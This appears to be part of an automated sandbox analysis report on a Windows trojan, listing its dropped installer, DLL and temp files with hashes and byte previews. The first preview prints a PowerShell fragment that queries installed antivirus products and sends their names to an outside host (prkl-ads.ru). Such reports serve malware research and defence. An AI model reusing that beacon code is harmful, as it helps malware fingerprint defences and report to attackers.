                                                  Preview:..I.n.v.o.k.e.-.W.e.b.R.e.q.u.e.s.t. .-.U.r.i. .(.".h.t.t.p.s.:././.p.r.k.l.-.a.d.s...r.u.?.s.t.a.t.u.s.=.r.e.g.&.k.e.y.=.l.l.k.s.7.4.6.3.8.s.j.&.s.i.t.e.=.T.e.s.t.".). .-.U.s.e.B.a.s.i.c.P.a.r.s.i.n.g.........s.l.e.e.p. .-.M.i.l.l.i.s.e.c.o.n.d.s. .1.2.9.7.........[.N.e.t...S.e.r.v.i.c.e.P.o.i.n.t.M.a.n.a.g.e.r.].:.:.S.e.c.u.r.i.t.y.P.r.o.t.o.c.o.l. .=. .[.N.e.t...S.e.c.u.r.i.t.y.P.r.o.t.o.c.o.l.T.y.p.e.].:.:.T.l.s.1.2.....$.A.n.t.i.V.i.r.u.s.P.r.o.d.u.c.t. .=. .G.e.t.-.W.m.i.O.b.j.e.c.t. .-.N.a.m.e.s.p.a.c.e. .".r.o.o.t.\.S.e.c.u.r.i.t.y.C.e.n.t.e.r.2.". .-.C.l.a.s.s. .A.n.t.i.V.i.r.u.s.P.r.o.d.u.c.t.....$.d.i.s.p.l.a.y.N.a.m.e.s. .=. .$.A.n.t.i.V.i.r.u.s.P.r.o.d.u.c.t. .|. .F.o.r.E.a.c.h.-.O.b.j.e.c.t. .{..... . . . .$._...d.i.s.p.l.a.y.N.a.m.e.....}.....$.d.i.s.p.l.a.y.N.a.m.e.s.S.t.r.i.n.g. .=. .$.d.i.s.p.l.a.y.N.a.m.e.s. .-.j.o.i.n. .".,. .".....$.u.r.l.1.1. .=. .".h.t.t.p.s.:././.p.r.k.l.-.a.d.s...r.u./.?.s.t.a.t.u.s.=.s.t.a.r.t.&.a.v.=.$.d.i.s.p.l.a.y.N.a.m.e.s.S.t.r.i.n.g."...

                                                  C:\Users\user\AppData\Local\Temp\shi6220.tmp

                                                  Download File
                                                  Process:C:\Users\user\Desktop\SecuriteInfo.com.Win32.Trojan-gen.16963.11783.exe
                                                  File Type:PE32+ executable (DLL) (GUI) x86-64, for MS Windows
                                                  Category:dropped
                                                  Size (bytes):3440640
                                                  Entropy (8bit):6.332754172601424
                                                  Encrypted:false
                                                  SSDEEP:49152:iGfM3glOz6pNbH2qLG1cWJ2asQceg4LApnrkLgQ63lOT0q4Fn6rmLn:Lc3wFeyCulhqUn
                                                  MD5:59A74284EACB95118CEDD7505F55E38F
                                                  SHA1:ACDC28D6A1EF5C197DE614C46BA07AEAEB25B50B
                                                  SHA-256:7C8EA70CA8EFB47632665833A6900E8F2836945AA80828B30DA73FBF4FCAF4F5
                                                  SHA-512:E69A82ADC2D13B413C0689E9BF281704A5EF3350694690BA6F3FE20DA0F66396245B9756D52C37166013F971C79C124436600C373544321A44D71F75A16A2B6A
                                                  Malicious:false
                                                  Antivirus:
                                                  • Antivirus: ReversingLabs, Detection: 0%
                                                  Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......E..2..a..a..a..=aa.an..`..an..`..an..`..a..a..an..`..an..`..an..`l.an.Qa..an..`..aRich..a........................PE..d...5..r.........." .....n...H......P.........................................4.....g.4...`A........................................p.0.L&....0.......2......@1...............4......F'.T....................*..(....................q..8...Tc0......................text...o........................... ..`.wpp_sf.Y........................... ..`.rdata...Z.......\...r..............@..@.data....A....0.......0.............@....pdata.......@1.......0.............@..@.didat........2......V2.............@....rsrc.........2......b2.............@..@.reloc........4......b4.............@..B................................................................................................................................................................

                                                  C:\Users\user\AppData\Roaming\Helper Company LLC\Helper 1.0.0\install\Helper.msi

                                                  Download File
                                                  Process:C:\Users\user\Desktop\SecuriteInfo.com.Win32.Trojan-gen.16963.11783.exe
                                                  File Type:Composite Document File V2 Document, Little Endian, Os: Windows, Version 10.0, MSI Installer, Last Printed: Fri Dec 11 11:47:44 2009, Create Time/Date: Fri Dec 11 11:47:44 2009, Last Saved Time/Date: Fri Sep 18 15:06:51 2020, Security: 0, Code page: 1252, Revision Number: {3E94FD11-3A35-44C9-B7E5-88560AB9D7CF}, Number of Words: 10, Subject: Helper, Author: Helper Company LLC, Name of Creating Application: Helper, Template: ;1033, Title: Installation Database, Keywords: Installer, MSI, Database, Number of Pages: 200
                                                  Category:dropped
                                                  Size (bytes):2483712
                                                  Entropy (8bit):6.553977992744686
                                                  Encrypted:false
                                                  SSDEEP:49152:Usz8r6I5WCmR+8zE37zIXX5U96RX5uzwJke7awlK2FV9fXlVeIf:Do6VE3re7a6f
                                                  MD5:5CB6155D5FCC94F92C8B05AECD0C300B
                                                  SHA1:D611E0353633D273702B9A751EDB4269C7E03536
                                                  SHA-256:E62A37BA72977559C2776A7F20FE812CB890F6C8494DCF70CBCD314585F7E8E5
                                                  SHA-512:793E7C416E558C93524335965FFCBCB2982B09D85E938510ABF0D9046E9F29C71E350EC3101F6EE50C071A4CBBC610C3267B5C18CE4BFD7918DCA9E949B32935
                                                  Malicious:true
                                                  Yara Hits:
                                                  • Rule: JoeSecurity_MalDoc, Description: Yara detected MalDoc, Source: C:\Users\user\AppData\Roaming\Helper Company LLC\Helper 1.0.0\install\Helper.msi, Author: Joe Security
                                                  Preview:......................>...................&...................................J.......c.......s.......................................m...n...o...p...q...r...s...t...u...v...w.......$...%...&...'...(...)...*...+...,...-...............................................................................................................................................................................................................................................................................................................................%...8........................................................................................... ...!..."...#...$.../...0...'...(...)...*...+...,...-...........1...6...2...3...4...5...9...7...@...C...:...;...<...=...>...?...$...A...B...L...D...E...F...G...H...I...%.......L...M...N...O...P...Q...R...S...T...U...V...W...X...Y...Z...[...\...]...^..._...`...a...b...c...d...e...f...g...h...i...j...k...l...m...n...o...p...q...r...s...t...u...v...w...x...y...z...

                                                  C:\Users\user\AppData\Roaming\Helper Company LLC\Helper 1.0.0\install\Helper1.cab

                                                  Download File
                                                  Process:C:\Users\user\Desktop\SecuriteInfo.com.Win32.Trojan-gen.16963.11783.exe
                                                  File Type:Microsoft Cabinet archive data, many, 1625945 bytes, 2 files, at 0x44 +A "z2201x64.exe" +A "icon.png", flags 0x4, ID 1234, number 1, extra bytes 20 in head, 51 datablocks, 0x1 compression
                                                  Category:dropped
                                                  Size (bytes):1636377
                                                  Entropy (8bit):7.999871457469054
                                                  Encrypted:true
                                                  SSDEEP:24576:6/2i+GjI+uAld+dnnMT+EPZexEjXRfVLr5RfbZGTF37oO/ChJ8mtEMHnH:C1I+uE4nnMdx5fVD07oOdmtnH
                                                  MD5:6738E7486358FFB12D914A2CE355DEF3
                                                  SHA1:3DCB2576DAE364D198972030C20DB2903A1740C3
                                                  SHA-256:02EFB04CA84D4140D4475F317D8E7810D07894E9865582DFD9C1EEF947C85A60
                                                  SHA-512:6000841128D45CA522DF6B770ADDE47409A667E7F1E1C2A8BB61BBB0658C9604530F4B98A950310BDF3C9F2215A309F0ABF4B14021B8321CDBBF4954F15B0113
                                                  Malicious:false
                                                  Preview:MSCF....Y.......D...........................Y....(..........z...3....3.........V.. .z2201x64.exe......3.....VA. .icon.png.....M..CK..x.U.0\.]I:....`.......6*...I.....B'...$1...:U..d...T.=......:..:3...."2.i.....B.v&hf.bg...4...[......w..{......{....[..c.1&.aX.T.a.2.?.......w.q....N.k....U..........kK....O...z{.z{...u5e.w..;&C...'...l.?t..(.............d..Z....[.Wby..Zo.......mj....eUk+......&......O...0..R...S.....".X.j...F.N.3r..4qW]...hE.;|.....N......p#...4.y..@.o..........g?.#T9z..?;.<qw..T(e.........P.u.V..@._.h...z.w.k.k.}..z....1.....O......;....._M...b.....R.6...<..0$...]L.I.p.Fh ....b...Y.'ZA>T.Z....+....V..V...A.B.R(Z+....8.o..h...6h....1...P=.h..R...W.....V.zZ.]l...[.].K....;sC.7.2.n.f...3...&@..6.Xb....9.V..I.OeUgX.t...q.&...ps.... Q...].....W9.`d....T.P.QM...P.h'.e.I.2..J.....V55....g.V...}.....7*....-.*!.|.4.<.....'p.p..(....[n@.V.+'.........BF..j....ym?.$....j.A.<..q......J.R.~.....aP.~ G:m.5}..d......R\..B........[

                                                  C:\Users\user\AppData\Roaming\Helper Company LLC\Helper 1.0.0\install\holder0.aiph

                                                  Download File
                                                  Process:C:\Users\user\Desktop\SecuriteInfo.com.Win32.Trojan-gen.16963.11783.exe
                                                  File Type:data
                                                  Category:dropped
                                                  Size (bytes):1636377
                                                  Entropy (8bit):0.0
                                                  Encrypted:false
                                                  SSDEEP:3::
                                                  MD5:4122C39F1D4ACC64F4D4E505814B754E
                                                  SHA1:181F83CDFDF4DC5FBC3B69EDAEA7A29093DE7FFA
                                                  SHA-256:658F96AAA0B744D2B7965EEA945FB61AE29616E9E3446C7A9CF8D20B83198272
                                                  SHA-512:2C8DD01A0645599F69B97408BBF466381CEC711168316D0C6565999F5C660D4CD090DCE6D0ABDEAA9D7E93BD3EB2BE96C60110EAF79E015F440989E27C599C74
                                                  Malicious:false
                                                  Preview:........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                                  C:\Windows\Installer\6766e2.msi

                                                  Download File
                                                  Process:C:\Windows\System32\msiexec.exe
                                                  File Type:Composite Document File V2 Document, Little Endian, Os: Windows, Version 10.0, MSI Installer, Last Printed: Fri Dec 11 11:47:44 2009, Create Time/Date: Fri Dec 11 11:47:44 2009, Last Saved Time/Date: Fri Sep 18 15:06:51 2020, Security: 0, Code page: 1252, Revision Number: {3E94FD11-3A35-44C9-B7E5-88560AB9D7CF}, Number of Words: 10, Subject: Helper, Author: Helper Company LLC, Name of Creating Application: Helper, Template: ;1033, Title: Installation Database, Keywords: Installer, MSI, Database, Number of Pages: 200
                                                  Category:dropped
                                                  Size (bytes):2483712
                                                  Entropy (8bit):6.553977992744686
                                                  Encrypted:false
                                                  SSDEEP:49152:Usz8r6I5WCmR+8zE37zIXX5U96RX5uzwJke7awlK2FV9fXlVeIf:Do6VE3re7a6f
                                                  MD5:5CB6155D5FCC94F92C8B05AECD0C300B
                                                  SHA1:D611E0353633D273702B9A751EDB4269C7E03536
                                                  SHA-256:E62A37BA72977559C2776A7F20FE812CB890F6C8494DCF70CBCD314585F7E8E5
                                                  SHA-512:793E7C416E558C93524335965FFCBCB2982B09D85E938510ABF0D9046E9F29C71E350EC3101F6EE50C071A4CBBC610C3267B5C18CE4BFD7918DCA9E949B32935
                                                  Malicious:true
                                                  Yara Hits:
                                                  • Rule: JoeSecurity_MalDoc, Description: Yara detected MalDoc, Source: C:\Windows\Installer\6766e2.msi, Author: Joe Security
                                                  Preview:......................>...................&...................................J.......c.......s.......................................m...n...o...p...q...r...s...t...u...v...w.......$...%...&...'...(...)...*...+...,...-...............................................................................................................................................................................................................................................................................................................................%...8........................................................................................... ...!..."...#...$.../...0...'...(...)...*...+...,...-...........1...6...2...3...4...5...9...7...@...C...:...;...<...=...>...?...$...A...B...L...D...E...F...G...H...I...%.......L...M...N...O...P...Q...R...S...T...U...V...W...X...Y...Z...[...\...]...^..._...`...a...b...c...d...e...f...g...h...i...j...k...l...m...n...o...p...q...r...s...t...u...v...w...x...y...z...

                                                  C:\Windows\Installer\MSI69F0.tmp

                                                  Download File
                                                  Process:C:\Windows\System32\msiexec.exe
                                                  File Type:PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
                                                  Category:dropped
                                                  Size (bytes):570784
                                                  Entropy (8bit):6.450187144191945
                                                  Encrypted:false
                                                  SSDEEP:6144:X+Sud3L4YgAc8wjVMeKRtGnm3CCRloVywX9gDAOAVafv5kh4JQCmR+gj:X+SuPgAc8+MjGCCslegDiwX5vOCmR+gj
                                                  MD5:DB7612F0FD6408D664185CFC81BEF0CB
                                                  SHA1:19A6334EC00365B4F4E57D387ED885B32AA7C9AA
                                                  SHA-256:E9E426B679B3EFB233F03C696E997E2DA3402F16A321E954B54454317FCEB240
                                                  SHA-512:25E129CB22AAABC68C42ECF10BB650AC4D0609B12C08703C780572BAC7ECF4559FCC49CD595C56EA48CF55260A984CFA333C08307FFB7C62268B03FBECC724B9
                                                  Malicious:false
                                                  Antivirus:
                                                  • Antivirus: ReversingLabs, Detection: 0%
                                                  Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......&r.gb..4b..4b..4.a.5o..4.a.5...4-o.5s..4-o.5z..4-o.5(..4.a.5{..4.a.5c..4.a.5E..4b..4...4.o.5...4.o.5c..4.ou4c..4b..4c..4.o.5c..4Richb..4................PE..L...f.c.........."!..."............................................................q.....@.....................................,....`...................#...p...b..8Y..p....................Y......xX..@...............<............................text...6........................... ..`.rdata..X...........................@..@.data...."...0......................@....rsrc........`.......&..............@..@.reloc...b...p...d..................@..B................................................................................................................................................................................................................................................................................

                                                  C:\Windows\Installer\MSI6AAC.tmp

                                                  Download File
                                                  Process:C:\Windows\System32\msiexec.exe
                                                  File Type:PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
                                                  Category:dropped
                                                  Size (bytes):570784
                                                  Entropy (8bit):6.450187144191945
                                                  Encrypted:false
                                                  SSDEEP:6144:X+Sud3L4YgAc8wjVMeKRtGnm3CCRloVywX9gDAOAVafv5kh4JQCmR+gj:X+SuPgAc8+MjGCCslegDiwX5vOCmR+gj
                                                  MD5:DB7612F0FD6408D664185CFC81BEF0CB
                                                  SHA1:19A6334EC00365B4F4E57D387ED885B32AA7C9AA
                                                  SHA-256:E9E426B679B3EFB233F03C696E997E2DA3402F16A321E954B54454317FCEB240
                                                  SHA-512:25E129CB22AAABC68C42ECF10BB650AC4D0609B12C08703C780572BAC7ECF4559FCC49CD595C56EA48CF55260A984CFA333C08307FFB7C62268B03FBECC724B9
                                                  Malicious:false
                                                  Antivirus:
                                                  • Antivirus: ReversingLabs, Detection: 0%
                                                  Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......&r.gb..4b..4b..4.a.5o..4.a.5...4-o.5s..4-o.5z..4-o.5(..4.a.5{..4.a.5c..4.a.5E..4b..4...4.o.5...4.o.5c..4.ou4c..4b..4c..4.o.5c..4Richb..4................PE..L...f.c.........."!..."............................................................q.....@.....................................,....`...................#...p...b..8Y..p....................Y......xX..@...............<............................text...6........................... ..`.rdata..X...........................@..@.data...."...0......................@....rsrc........`.......&..............@..@.reloc...b...p...d..................@..B................................................................................................................................................................................................................................................................................

                                                  C:\Windows\Installer\MSI6AFB.tmp

                                                  Download File
                                                  Process:C:\Windows\System32\msiexec.exe
                                                  File Type:PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
                                                  Category:dropped
                                                  Size (bytes):570784
                                                  Entropy (8bit):6.450187144191945
                                                  Encrypted:false
                                                  SSDEEP:6144:X+Sud3L4YgAc8wjVMeKRtGnm3CCRloVywX9gDAOAVafv5kh4JQCmR+gj:X+SuPgAc8+MjGCCslegDiwX5vOCmR+gj
                                                  MD5:DB7612F0FD6408D664185CFC81BEF0CB
                                                  SHA1:19A6334EC00365B4F4E57D387ED885B32AA7C9AA
                                                  SHA-256:E9E426B679B3EFB233F03C696E997E2DA3402F16A321E954B54454317FCEB240
                                                  SHA-512:25E129CB22AAABC68C42ECF10BB650AC4D0609B12C08703C780572BAC7ECF4559FCC49CD595C56EA48CF55260A984CFA333C08307FFB7C62268B03FBECC724B9
                                                  Malicious:false
                                                  Antivirus:
                                                  • Antivirus: ReversingLabs, Detection: 0%
                                                  Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......&r.gb..4b..4b..4.a.5o..4.a.5...4-o.5s..4-o.5z..4-o.5(..4.a.5{..4.a.5c..4.a.5E..4b..4...4.o.5...4.o.5c..4.ou4c..4b..4c..4.o.5c..4Richb..4................PE..L...f.c.........."!..."............................................................q.....@.....................................,....`...................#...p...b..8Y..p....................Y......xX..@...............<............................text...6........................... ..`.rdata..X...........................@..@.data...."...0......................@....rsrc........`.......&..............@..@.reloc...b...p...d..................@..B................................................................................................................................................................................................................................................................................

                                                  C:\Windows\Installer\MSI6B3B.tmp

                                                  Download File
                                                  Process:C:\Windows\System32\msiexec.exe
                                                  File Type:PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
                                                  Category:dropped
                                                  Size (bytes):570784
                                                  Entropy (8bit):6.450187144191945
                                                  Encrypted:false
                                                  SSDEEP:6144:X+Sud3L4YgAc8wjVMeKRtGnm3CCRloVywX9gDAOAVafv5kh4JQCmR+gj:X+SuPgAc8+MjGCCslegDiwX5vOCmR+gj
                                                  MD5:DB7612F0FD6408D664185CFC81BEF0CB
                                                  SHA1:19A6334EC00365B4F4E57D387ED885B32AA7C9AA
                                                  SHA-256:E9E426B679B3EFB233F03C696E997E2DA3402F16A321E954B54454317FCEB240
                                                  SHA-512:25E129CB22AAABC68C42ECF10BB650AC4D0609B12C08703C780572BAC7ECF4559FCC49CD595C56EA48CF55260A984CFA333C08307FFB7C62268B03FBECC724B9
                                                  Malicious:false
                                                  Antivirus:
                                                  • Antivirus: ReversingLabs, Detection: 0%
                                                  Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......&r.gb..4b..4b..4.a.5o..4.a.5...4-o.5s..4-o.5z..4-o.5(..4.a.5{..4.a.5c..4.a.5E..4b..4...4.o.5...4.o.5c..4.ou4c..4b..4c..4.o.5c..4Richb..4................PE..L...f.c.........."!..."............................................................q.....@.....................................,....`...................#...p...b..8Y..p....................Y......xX..@...............<............................text...6........................... ..`.rdata..X...........................@..@.data...."...0......................@....rsrc........`.......&..............@..@.reloc...b...p...d..................@..B................................................................................................................................................................................................................................................................................

                                                  C:\Windows\Installer\MSI6B9A.tmp

                                                  Download File
                                                  Process:C:\Windows\System32\msiexec.exe
                                                  File Type:PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
                                                  Category:dropped
                                                  Size (bytes):722336
                                                  Entropy (8bit):6.433567465029135
                                                  Encrypted:false
                                                  SSDEEP:12288:xZCGkZjiIiS4fZrmrRahiyN+bqpoMU0Z/4CwwEjD4JyVzIXyJe55EL96RgO5uh:xBkZVI+ep5U2fvEjD4wzIXX5EL96RX5u
                                                  MD5:F7B1DDC86CD51E3391AA8BF4BE48D994
                                                  SHA1:A0C0A4A77991D7F8DF722ACDD782310A6DA2A904
                                                  SHA-256:AC2DF3283D65AB78CA399232FA090764636E0FEC7AB53BE28F6EE93733D8787F
                                                  SHA-512:F853C3CF9EC175E946DD42F7F35D130F4FB941F64BBF5780CE452FE6E87459217B80872DB375AD1BBAFC47AD263408E4222D81F62C7DF92C77E23E77E67E6FA6
                                                  Malicious:false
                                                  Antivirus:
                                                  • Antivirus: ReversingLabs, Detection: 0%
                                                  Preview:MZ......................@................................... ...........!..L.!This program cannot be run in DOS mode....$.......m..D)...)...).......$...........f...8...f...1.......0...f...t.......(.......>...)...F.......a.......(.....*.(...).B.(.......(...Rich)...........................PE..L.....c.........."!..."..................................................... ......q.....@.........................@M......\N..........h................#.......o..8@..p....................@..........@....................K..@....................text...|........................... ..`.rdata..Bb.......d..................@..@.data....'...p.......V..............@....rsrc...h............l..............@..@.reloc...o.......p...r..............@..B........................................................................................................................................................................................................................................................................

                                                  C:\Windows\Installer\MSI6D31.tmp

                                                  Download File
                                                  Process:C:\Windows\System32\msiexec.exe
                                                  File Type:data
                                                  Category:dropped
                                                  Size (bytes):3072
                                                  Entropy (8bit):6.955008373253885
                                                  Encrypted:false
                                                  SSDEEP:48:zY1TmrW1/6pPT4MiTm1AWlyP3NZ7PHnuWhhFgPRCZnb/07oB8LyixB8hKhMOElhF:zY1TcDRT47TyAWlyfvnVhJ/07oB4fxB4
                                                  MD5:EE9508911C5E3C5D8CE51E33EF5BDEE2
                                                  SHA1:B12E94AE8A42876A3F8046FB58973C1C38E33256
                                                  SHA-256:C13C99C5C834E11233DCC835923D0474BBA981AB9503E85516BBAF262E432F67
                                                  SHA-512:8F8D68840EE45A9EB5A2FD313752A0F80F1CBCF34EE17CAB0494C47DD2B1BF37D5BD44319440EC6E1EEDFAC2AE204D100FE79E07078926B532A5CCE6D79D8CBE
                                                  Malicious:false
                                                  Preview:...@IXOS.@.....@Z..W.@.....@.....@.....@.....@.....@......&.{8415BADB-0228-466E-A597-68F06CD8880C}..Helper..Helper.msi.@.....@.....@.....@........&.{3E94FD11-3A35-44C9-B7E5-88560AB9D7CF}.....@.....@.....@.....@.......@.....@.....@.......@......Helper......Rollback..Rolling back action:....RollbackCleanup..Removing backup files..File: [1]...@.......@........ProcessComponents..Updating component registration...@.....@.....@.]....&.{1DAA5F1C-35AF-4DBC-BCD3-B8B55A5E6DC0}9.C:\Users\user\AppData\Roaming\Helper Company LLC\Helper\.@.......@.....@.....@......&.{96C4647E-D5A3-492E-A70C-151AAE336B85}..01:\Software\Helper Company LLC\Helper\Version.@.......@.....@.....@......&.{E50D5DA2-61B1-4DD4-BD53-57A21481EBCF}d.01:\Software\Caphyon\Advanced Installer\LZMA\{8415BADB-0228-466E-A597-68F06CD8880C}\1.0.0\AI_ExePath.@.......@.....@.....@......&.{2E55D07B-CAEF-4B54-92D8-F9199243F537}G.C:\Users\user\AppData\Roaming\Helper Company LLC\Helper\7z2201-x64.exe.@.......@.....@.....@......&.{1DD84FFF-FB0

                                                  C:\Windows\Installer\MSI6D80.tmp

                                                  Download File
                                                  Process:C:\Windows\System32\msiexec.exe
                                                  File Type:PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
                                                  Category:modified
                                                  Size (bytes):634784
                                                  Entropy (8bit):6.564827321629019
                                                  Encrypted:false
                                                  SSDEEP:12288:LXRXK9pUYawEtwPoypH29aXglK2FVL114sfUozUyMotjUPGDVeIfv:zJKHEtH7awlK2FV511fprxtjUPkVeIfv
                                                  MD5:A619F980C1BAA155F7CFB79553AA10B1
                                                  SHA1:DA4DCAEC351309B00D024ADB704DD61230E68F81
                                                  SHA-256:A0ACE6862AC97CDCA53A9458B57901A8FE3DB546A4EA4D5BC3D05E7C119418A7
                                                  SHA-512:983C44376DCBAB6855F6F474AA3BFB672D0ADAB63A38096FAE33DA80F585DA8F881A9AE352EDFE80ED3CD424E42B45FB8AA7CC27337925241844B03EE300E7D9
                                                  Malicious:false
                                                  Antivirus:
                                                  • Antivirus: ReversingLabs, Detection: 0%
                                                  Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......T18Y.PV..PV..PV.."U..PV.."S..PV.."R..PV._,R..PV._,U..PV._,S.KPV.."W..PV..PW..QV..,_.!PV..,V..PV..,...PV..P...PV..,T..PV.Rich.PV.................PE..L.....c.........."!...".&...v......oo.......@...........................................@.................................L........`...................#...p...Y...R..p...................@S.......R..@............@...............................text...x$.......&.................. ..`.rdata..B....@.......*..............@..@.data........0......................@....rsrc........`.......,..............@..@.reloc...Y...p...Z...2..............@..B........................................................................................................................................................................................................................................................................................

                                                  C:\Windows\Installer\SourceHash{8415BADB-0228-466E-A597-68F06CD8880C}

                                                  Download File
                                                  Process:C:\Windows\System32\msiexec.exe
                                                  File Type:Composite Document File V2 Document, Cannot read section info
                                                  Category:dropped
                                                  Size (bytes):49152
                                                  Entropy (8bit):0.7864762418515975
                                                  Encrypted:false
                                                  SSDEEP:12:JSbX72FjJCXAlfLIlHuRp1hG7777777777777777777777777ZDHF0buM1MQ7tWv:J8UIwI6FzcO2tFF
                                                  MD5:0F34013FDABF2F445620C6D05511DDAA
                                                  SHA1:D15B5FD9FB2D82E95C5579422251E1865E26B6E2
                                                  SHA-256:CBE2A0D8362A8786D08D26E7F4D65DD5007CC0664C48236C3135D4DA1B6C4285
                                                  SHA-512:0D54C2C7B77DE112B9C1927895A443070DCA64EB8FC397EBBA25F312BE50CA86879F8E947E8D72B2835B65CC2250B4B66C7A1BE2ED89CE97A8CC2B9EA77C375E
                                                  Malicious:false
                                                  Preview:......................>...............................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                                  C:\Windows\Installer\inprogressinstallinfo.ipi

                                                  Download File
                                                  Process:C:\Windows\System32\msiexec.exe
                                                  File Type:Composite Document File V2 Document, Cannot read section info
                                                  Category:dropped
                                                  Size (bytes):32768
                                                  Entropy (8bit):1.343539588200702
                                                  Encrypted:false
                                                  SSDEEP:48:IxOuHthPIFX4RT53DoQJZUQs/HDDWSKQi/HDD8AEKgCykVFDVYLk3QxSKQbT0r:AOMIST5/4qtnkCrsLx
                                                  MD5:F2FC36AFA55BE7E1091773027A2038C2
                                                  SHA1:5CDAF053D9C82E341A24A28BBB538E6B1CA12E5F
                                                  SHA-256:5EBADACACC4FFB79919354FD169445C8480EF3D44FA9CEAFC5A21634B28026C3
                                                  SHA-512:C1098851B4938F49B7FA42B37D4D712B0D03D039B8D404BC6EDB0BBED7576140B1F5CD51CD6BCE8056AC2774F2914D8CBAF4F46555A8B1831D77F124F050C17F
                                                  Malicious:false
                                                  Preview:......................>...............................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                                  C:\Windows\Microsoft.NET\Framework64\v4.0.30319\ngen.log

                                                  Download File
                                                  Process:C:\Windows\System32\msiexec.exe
                                                  File Type:Unicode text, UTF-8 (with BOM) text, with CRLF line terminators
                                                  Category:dropped
                                                  Size (bytes):404314
                                                  Entropy (8bit):5.400358247596047
                                                  Encrypted:false
                                                  SSDEEP:3072:iHHJCoX5CNWFHjkzRl1pqf5JjzH6wbxygaK8Nkv6kF8Kwu8K8uBD556GIlZZ6bFK:i0LVlABOYCe6+k
                                                  MD5:068A5666AA000619DC5352410BE00F1D
                                                  SHA1:F5F90FBC780676B9FE90414460884B6E4961137C
                                                  SHA-256:0229C849C8A506F184FF89F673BF6E4ABAAC3E7E7D11DFCFFFEB881DAE8AE3B0
                                                  SHA-512:2F3051D26E29A1033AFAE0CF36330F18E4A061E753AB260FECC6CC06096930571052AFD7B6F6E66BA0C765E69D8A4DC511AD1473CE519CEF5640E352C73D9BC9
                                                  Malicious:false
                                                  Preview:.To learn about increasing the verbosity of the NGen log files please see http://go.microsoft.com/fwlink/?linkid=210113..07/23/2020 10:13:25.847 [3928]: Command line: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\ngen.exe install Microsoft.VisualStudio.Tools.Applications.Hosting, Version=10.0.0.00000, Culture=neutral, PublicKeyToken=B03F5F7F11D50A3A /queue:3 /NoDependencies ..07/23/2020 10:13:25.863 [3928]: ngen returning 0x00000000..07/23/2020 10:13:25.925 [1900]: Command line: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\ngen.exe install Microsoft.VisualStudio.Tools.Applications.ServerDocument, Version=10.0.0.00000, Culture=neutral, PublicKeyToken=B03F5F7F11D50A3A /queue:3 /NoDependencies ..07/23/2020 10:13:25.925 [1900]: ngen returning 0x00000000..07/23/2020 10:13:25.972 [4436]: Command line: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\ngen.exe install Microsoft.Office.Tools.v4.0.Framework, Version=10.0.0.00000, Culture=neutral, PublicKeyToken=B03F5F7F11D50A3A /queue:3 /N

                                                  C:\Windows\Temp\~DFC16D2AFA3557488C.TMP

                                                  Download File
                                                  Process:C:\Windows\System32\msiexec.exe
                                                  File Type:data
                                                  Category:dropped
                                                  Size (bytes):81920
                                                  Entropy (8bit):0.1673543826685183
                                                  Encrypted:false
                                                  SSDEEP:48:hyRT2QxSKQYQs/HDDWSKQi/HDD8AEKgCykVFDVYLkK8iQ:hyJqtnkCrsW
                                                  MD5:5D3B9A885F8E94527C48C2067CCE8CF3
                                                  SHA1:34A30E730AD23A13B22F02689769A7420D06C9EB
                                                  SHA-256:F8CC0333C7BAC3DD10A3266B8772FF2461B927C6A0D746C8BC149789AD05E9AC
                                                  SHA-512:51F1F35426DC9DEF20D4BA3C478AB0971C4F805E2F2115F72BE2EB526040D483CEF6B6E1509760064CC82F0CB8180EED992B11218A272B422C5136442AD98A62
                                                  Malicious:false
                                                  Preview:........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                                  C:\Windows\Temp\~DFEDB0337641F519CF.TMP

                                                  Download File
                                                  Process:C:\Windows\System32\msiexec.exe
                                                  File Type:data
                                                  Category:dropped
                                                  Size (bytes):32768
                                                  Entropy (8bit):0.09732975350377866
                                                  Encrypted:false
                                                  SSDEEP:6:xPLG7iVCnLG7iVrKOzPLHKO0bu9xsZpiMtsW0FQT8KEojytOby4lSVky6lWf1:50i8n0itFzDHF0buM1MQ7tWObdzWd
                                                  MD5:017120DE836CF251613B70DAE84B5F64
                                                  SHA1:FBE863C57273C0AFC9427C67148D34CFD57E75B5
                                                  SHA-256:CD3FD6AA4710FCE6FF0B55B9C744E9252DBD5896D604D8A50658AFDE2E022051
                                                  SHA-512:800D3C9890BCE9F0A96469FB63CD8FAA46FBDC79A24AC0F43AB3A2713F7F6FC5A6F9A91F4B790F8B762AF5D35D3B330C50F341625D75F8477FBE68934F130461
                                                  Malicious:false
                                                  Preview:........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                                  Static File Info

                                                  General

                                                  File type:PE32 executable (GUI) Intel 80386, for MS Windows
                                                  Entropy (8bit):6.993502133196768
                                                  TrID:
                                                  • Win32 Executable (generic) a (10002005/4) 98.81%
                                                  • Windows ActiveX control (116523/4) 1.15%
                                                  • Generic Win/DOS Executable (2004/3) 0.02%
                                                  • DOS Executable Generic (2002/1) 0.02%
                                                  • Autodesk FLIC Image File (extensions: flc, fli, cel) (7/3) 0.00%
                                                  File name:SecuriteInfo.com.Win32.Trojan-gen.16963.11783.exe
                                                  File size:7'465'048 bytes
                                                  MD5:19124312cafa0b1c5524329755a5d6a2
                                                  SHA1:ccd8c01b210b26cd708a3e4cc49de45fed9abac1
